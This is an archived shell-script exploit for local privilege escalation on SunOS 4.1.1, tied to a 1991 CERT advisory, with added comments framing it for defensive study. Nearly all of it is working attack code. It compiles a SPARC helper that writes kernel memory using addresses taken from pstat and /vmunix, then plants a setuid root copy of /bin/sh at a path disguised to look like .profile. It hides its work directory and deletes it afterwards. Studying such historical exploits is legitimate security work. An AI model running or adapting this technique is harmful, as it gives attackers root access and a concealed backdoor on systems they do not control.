- #!/bin/sh
- # Archived local privilege-escalation script, annotated for defensive study; the CERT advisory named below is the reference for the vendor fix.
- #**************************************************************************
- # HACK: Exploit floating point problems in SunOS 4.1.1
- # CERT: CA-91:16.SunOS.SPARC.Integer_Division.vulnerability 09/18/91
- # System: Sun OS 4.1.1 (? 4.1.2)
- #**************************************************************************
- # Flow: build a small SPARC helper in a dot-named /tmp directory, read two kernel addresses, run the helper twice, then copy /bin/sh to a setuid file.
- # Artifacts: /tmp/.tmp<pid>/ (mulc.c, muls.s, mul, PROCP<pid>; removed after about 5 s) and a mode-4755 copy of /bin/sh at /.prof1le. A routine setuid inventory (for example find / -perm -4000 -print) would surface that copy.
- PID=$$
- TMPDIR=/tmp/.tmp$PID   # dot-prefixed name, so a plain ls of /tmp does not list it
- SUIDSH=/.prof1le   # digit 1 in place of the letter l: resembles .profile at a glance
- # Neither command below is checked; if mkdir or cd fails, the generated files land in the current directory instead.
- mkdir $TMPDIR
- cd $TMPDIR
- # Two here-documents follow. mulc.c is a C driver that parses two numeric arguments with strtol and passes them to wrmem; muls.s is the SPARC assembly that defines _wrmem.
- cat > mulc.c <<EOF
- main(argc,argv) char *argv[];{
- wrmem(strtol(argv[1],0,0), strtol(argv[2],0,0));
- }
- EOF
- cat > muls.s <<EOF
- .globl _wrmem
-
- _wrmem: mov %o0, %g2
- mov %o1, %g3
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- mov %g2, %sp
- umul %g3, 1, %l0
- EOF
- cc -o mul mulc.c muls.s -ldl
- # The remaining steps derive two hexadecimal values: the procp field reported by /etc/pstat -u for this shell plus 0x4C, and the address of the intstack symbol listed by nm /vmunix.
- # NOTE(review): the script assumes /etc/pstat and the /vmunix symbol table are usable by the invoking user; whether access to them can be restricted on this OS should be confirmed.
- TMPFILE=$TMPDIR/PROCP$$
-
- # Find proc pointer: dc works in base 16 (16o 16i), adds 4C to the upper-cased procp field, and the result is lower-cased into $TMPFILE.
- cat <<EOF | dc | tr 'A-Z' 'a-z' >$TMPFILE
- 16o 16i
- 4C `/etc/pstat -u $$ | grep procp | cut -f2 | tr 'a-z' 'A-Z'` + p
- EOF
- read PROCP <$TMPFILE
- SADR=`nm /vmunix | grep ' intstack' |cut -d' ' -f1`   # first space-separated field of the nm line that matches ' intstack'
- ./mul 0x${SADR} 0x10000   # helper run 1: the intstack address and the constant 0x10000
- ./mul 0x${PROCP} 0x${SADR}   # helper run 2: the computed proc value and the intstack address
- cp /bin/sh $SUIDSH; chmod 4755 $SUIDSH   # mode 4755 sets the setuid bit, so the copy runs with its owner's identity; writing to / presumably needs the privilege the earlier steps aim for
- echo -n "Id = "
- whoami
- ( sleep 5; rm -rf $TMPDIR ) &   # delayed background removal of the build directory; the setuid copy is left in place
- cp /bin/sh $SUIDSH; chmod 4755 $SUIDSH   # verbatim repeat of the copy and chmod issued before whoami
- # www.hack.co.za [2000]#